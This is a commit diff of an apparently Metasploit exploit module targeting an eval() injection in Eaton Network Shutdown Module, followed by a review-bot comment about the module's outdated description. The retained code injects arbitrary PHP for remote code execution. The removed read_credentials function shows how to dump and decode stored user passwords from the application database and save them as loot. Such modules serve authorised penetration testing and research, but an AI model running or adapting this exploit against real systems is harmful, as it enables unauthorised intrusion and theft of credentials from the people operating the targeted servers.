Strip the credential dumping stuff (making it auxiliary)
Also a little description update
unstable
parent
6b524ff22a
commit
fd2296317d
|
@ -18,8 +18,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Description' => %q{
|
||||
This module exploits a vulnerability in lib/dbtools.inc which uses
|
||||
unsanitized user input inside a eval() call. Additionally the base64 encoded
|
||||
user credentials are extracted from the database of the application.
|
||||
|
||||
user credentials are extracted from the database of the application. Please
|
||||
note that in order to be able to steal credentials, the vulnerable service
|
||||
must have at least one USV module (an entry in the "nodes" table in mgedb.db)
|
||||
},
|
||||
'Author' => [ 'h0ng10' ], # original discovery, msf module
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -46,9 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(4679),
|
||||
OptBool.new('READ_CREDS', [ true, 'Extract credentials from the target db', true ]),
|
||||
|
||||
Opt::RPORT(4679)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
@ -65,42 +64,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return CheckCode::Safe
|
||||
end
|
||||
|
||||
def read_credentials()
|
||||
pattern = rand_text_numeric(10)
|
||||
users_var = rand_text_alpha(10)
|
||||
user_var = rand_text_alpha(10)
|
||||
php = <<-EOT
|
||||
$#{users_var} = &queryDB("SELECT * FROM configUsers;");
|
||||
foreach($#{users_var} as $#{user_var}) {
|
||||
print "#{pattern}" .$#{user_var}["login"]."#{pattern}".base64_decode($#{user_var}["pwd"])."#{pattern}";
|
||||
} die();
|
||||
EOT
|
||||
|
||||
print_status("Reading user credentials from the database")
|
||||
response = execute_php_code(php)
|
||||
|
||||
if not response or response.code != 200 then
|
||||
print_error("Failed: Error requesting page")
|
||||
return
|
||||
end
|
||||
|
||||
credentials = response.body.to_s.scan(/\d{10}(.*)\d{10}(.*)\d{10}/)
|
||||
|
||||
return if credentials.length == 0
|
||||
print_status("Got #{credentials.length} record(s):")
|
||||
cred_txt = "#Username:Password\n"
|
||||
credentials.each do |record|
|
||||
print_status("Username: #{record[0]}, Password: #{record[1]}")
|
||||
cred_txt << "#{record[0]}:#{record[1]}\n"
|
||||
end
|
||||
|
||||
loot_name = "eaton.nsm.credentials"
|
||||
loot_type = "text/plain"
|
||||
loot_filename = "eaton_nsm_creds.txt"
|
||||
loot_desc = "Eaton Network Shutdown Module credentials"
|
||||
store_loot(loot_name, loot_type, datastore['RHOST'], cred_txt, loot_filename, loot_desc)
|
||||
end
|
||||
|
||||
def execute_php_code(code, opts = {})
|
||||
param_name = rand_text_alpha(6)
|
||||
padding = rand_text_alpha(6)
|
||||
|
@ -123,13 +86,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
{
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
}, 5)
|
||||
})
|
||||
res
|
||||
end
|
||||
|
||||
def exploit
|
||||
read_credentials unless datastore['READ_CREDS'] == false
|
||||
print_status("Sending payload")
|
||||
print_status("#{rhost}:#{rport} - Sending payload")
|
||||
execute_php_code(payload.encoded)
|
||||
handler
|
||||
end
|
||||
|
|
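Review bot: The description text added in the first hunk ("Please note that in order to be able to steal credentials, the vulnerable service must have at least one USV module…", together with the retained "Additionally the base64 encoded user credentials are extracted from the database of the application.") still says this module extracts credentials, but the same commit removes read_credentials, the READ_CREDS option and the read_credentials call in exploit, so the module's own description no longer matches what it does. That wording looks like it belongs to the auxiliary module the commit title mentions; for this exploit module I would drop the credential sentences and redirect the reader instead, e.g. `This module exploits a vulnerability in lib/dbtools.inc which uses` / `unsanitized user input inside an eval() call to execute arbitrary PHP.` / `Credential extraction has been moved to a separate auxiliary module.`. While here, `a eval()` on the unchanged context line should read `an eval()`. The register_options and exploit hunks need no further change for this point.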